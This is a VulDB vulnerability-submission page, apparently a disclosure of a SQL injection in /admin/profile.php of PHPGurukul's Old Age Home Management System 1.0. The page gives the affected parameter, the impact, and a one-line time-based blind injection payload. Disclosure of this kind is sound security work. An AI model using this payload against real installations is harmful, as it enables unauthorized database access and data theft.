| Título | phpgurukul.com Old Age Home Management System V1.0 SQL injection |
|---|
| Descrição | # [Security] SQL injection in /admin/profile.php
## NAME OF AFFECTED PRODUCT(S)
- Old Age Home Management System
## Vendor Homepage
- https://phpgurukul.com/old-age-home-management-system-using-php-and-mysql/
## AFFECTED VERSION(S)
- V1.0
## Software Link
- https://phpgurukul.com/projects/Old-Age-Home-MS-using-PHP.zip
## PROBLEM TYPE
- SQL injection
## Root Cause
- A SQL injection vulnerability exists in `/admin/profile.php` due to improper input sanitization of the `adminname` parameter.
## Impact
- Unauthorized database access, data leakage, data manipulation, etc.
## Vulnerability Details and POC
- Parameter: `adminname` (POST)
- Payload:
```bash
adminname=1' AND (SELECT 4479 FROM (SELECT(SLEEP(5)))SYMc) AND 'gnpI'='gnpI&username=admin&contactnumber=1&[email protected]&submit=
|
|---|
| Fonte | ⚠️ https://github.com/Gxxianzhong123/CVE1/issues/1 |
|---|
| Utilizador | wuguanfengyue (UID 52312) |
|---|
| Submissão | 30/03/2025 19h21 (há 1 Ano) |
|---|
| Moderação | 03/04/2025 20h47 (4 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 303261 [PHPGurukul Old Age Home Management System 1.0 /admin/profile.php adminname/contactnumber Injeção SQL] |
|---|
| Pontos | 20 |
|---|